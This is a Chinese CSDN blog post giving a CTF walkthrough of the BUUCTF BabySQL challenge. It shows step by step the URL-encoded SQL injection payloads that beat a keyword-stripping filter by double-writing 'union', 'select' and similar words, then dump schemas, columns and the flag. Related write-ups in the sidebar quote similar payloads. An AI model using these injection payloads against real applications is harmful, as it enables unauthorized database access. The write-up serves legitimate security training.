buuctf-[极客大挑战 2019]BabySQL(小宇特详解)

最新推荐文章于 2024-05-05 18:15:00 发布
最新推荐文章于 2024-05-05 18:15:00 发布
阅读量5k 收藏 15
点赞数 3
文章标签: php 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/122588325
版权

buuctf-[极客大挑战 2019]BabySQL(小宇特详解)

这里看题的话是一道SQL注入。

这里先尝试一下万能密码

这里发现它过滤了or(直接删除了or)

这里尝试进行双写

也就是oorr,这里删除了or后又重新构造了一个or

这里发现还是不行

这里先看一下双写union select 1

/check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23

这里发现不是报错,而是列数不对

当列数为3的时候对了

/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,3 %23

然后这里就进行常规的sql注入即可

这里先进行爆库

/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,database() %23

然后爆出所有的数据库

/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom
(infoorrmation_schema.schemata) %23

这里看到了ctf库,爆破

/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere 
 table_name="Flag" %23

爆数据

/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag) %23

小宇特详解
关注
  • 3
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
微信小程序-学院.zip
04-14
你可以使用双大括号`{{ }}`将变量插入到WXML中,而这些变量的值是在JS中动态更新的。 3. **网络请求**:微信小程序提供了wx.request接口,用于向服务器发送HTTP请求,获取在线小说的数据。 4. **组件化开发**:...
微信小程序实验源码-学院 v1.0
12-02
微信小程序实验源码-学院是以wxml进行开发的微信小程序源码。 它实现文章列表,文章详情等功能,色: - 实现右侧菜单栏 - 实现显示markdown内容 数据接口: 使用本地数据接口 目录结构: - image 存放项目图片...
BUUCTF [挑战 2019]BabySQL
weixin_73399382的博客
04-16 329
使用payload:1' union selselectect 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23发现有报错,看了一下还能过滤的多半是where。使用payload:1' union select database(),version(),1%23报错,可能是union或者select中一个或者都是。双写by后不再报错,说明by被过滤需双写。
2024年最全Buuctf-Web-[挑战 2024]EasySQL 1 题解及思路总结(2),网络安全面试题最新2024
最新发布
2401_84132723的博客
05-05 405
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
挑战2019——baby sql
qq_44308327的博客
11-22 666
baby sql(注意双写绕过) 判断注入类型 既然是sql注入题,那就先判断注入的数据类型 payload: ?username=admin&password=1 payload: ?username=admin&password=2-1 //判断页面是否发生变化,如有变化则为字符型注入,反之则为整型注入 无变化,所以为整型注入 判断回显位 payload:?username=admin&password=1' order by 3%23 ...
[挑战 2019]BabySQL 1
bring_coco的博客
09-22 5535
[挑战 2019]BabySQL 1 [目标] Sql注入 [环境] Buuctf [工具] 浏览器 [分析] 1.直接试万能密码 发现无法登录 2.直接进行sql注入 尝试1’ order by 3# 发现order中的or被过滤,同时by也被过滤 因此直接尝试联合注入 Payload: 1’union select 1#&password=1 Url: 1%27union%20select%201%23&password=1 可以发现这里union select都被过滤了,因
[挑战 2019]BabySQL
qq_45237160的博客
01-12 355
我们首先用万能密码尝试登录,提示我们账号或者密码错误,可以证明 符号 or并没有起作用,应该是被过滤掉了,也证明了此处仍然存在注入点。然后爆表,这里试了好多次,一直以为information和schema也被过滤了,后来发现并没有,过滤的还是or,from也被过滤了。接下来联合查询进行查询回显的点,仍然报错 ,根据报错信息可知:union,select都被过滤为空了。访问链接,我们看到熟悉的界面,不过页面上的提示内容变了,告诉了我们这里会有过滤。仍然复写绕过,得到回显点,2和3处。
标记:标记-标记系统
02-03
标记-标记系统 设置服务器 npm install -g gitinspector npm install -g eslint npm install nano --save npm install couch-admin --save npm install pouchdb --save npm install --save pouchdb-find npm...
微信小程序-- 学院
04-02
在这个“微信小程序-- 学院”资源中,我们可以期待学习到关于如何利用微信小程序平台进行开发的专业知识。 1. 微信小程序基础: 微信小程序的基础包括了它的架构、生命周期和API。学习者需要理解小程序的XML和...
与团队-与团队1
08-03
与团队》这本书由Brian W. Fitzpatrick和Ben Collins-Sussman共同撰写,两位作者来自Google,具有丰富的项目开发和管理经验,别是在Subversion的开发中扮演了重要角色。这本书聚焦于软件开发中的非技术因素...
挑战2019babysql
kindyyy的博客
04-08 1320
我也是参考了大佬的wp才会做的题目..... 大佬博:[挑战 2019]BabySQL - 云千 - 博园 (对我自己来说)要一步一步的从查库,查表,查列,查字段慢慢来,从这道题我们还要注意有些命令是会被注释的,可以用双写绕过。 大概就是这样。先看题目吧: ...
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2698
题目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
BUUCTF [挑战 2019]BabySQL 1
Seizerz的博客
04-03 426
打开就是个登录框,这道题是注入,那无疑就是user或者password处了 输入数据,
BUUCTF [挑战 2019] BabySQL
Senimo
03-25 3844
BUUCTF [挑战 2019] BabySQL 启动靶机,打开环境: 尝试登陆: 因为前两次的题目BUUCTF 挑战 2019 EasySQL和均用万能密码登陆成功,再次尝试: /check.php ?username=admin' or '1'='1 &password=1 登陆失败,尝试注释掉password内容: /check.php ?username=adm...
BUUCTF[挑战 2019] EasySQL 1
m0_75178803的博客
06-12 4258
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
[GXYCTF2019]BabySQli 1
m0_62879498的博客
04-13 3975
[GXYCTF2019]BabySQli 1 我们先判断注入点,发现注入点在 用户名('or 1=1-- q) 发现 or 被过滤掉,我们尝试使用大小写绕过,成功。 判断字段数:'OR 1=1 order by 1 – q 使用联合查询 'union select 1,2,3-- q 发现没有直接将回显返回出来 理论上来说,联合查询是不可以使用的 同时,这道题是会有返回了错误信息,是不是感觉报错注入在向自己招手? 想尝试的童鞋可以故意使用错误的sql语句看是否有错误信息回显 但痛苦的是,在本关过滤掉
BUUCTF 之 [挑战 2019] Havefun(GET 传参)
两个月亮
12-29 2315
网站首页没有按钮,提示信息等等。遇到这种情况往往需要查看网页源代码或进行网站后台扫描。我们先来查看一下网页源代码(右键后点击。在地址栏中输入构造后的链接,敲击。启动靶机后,映入眼帘的是一只猫。这是一段 PHP 代码。即可获得 flag。
buuctf web 挑战2019
08-24
对于BUUCTF Web挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值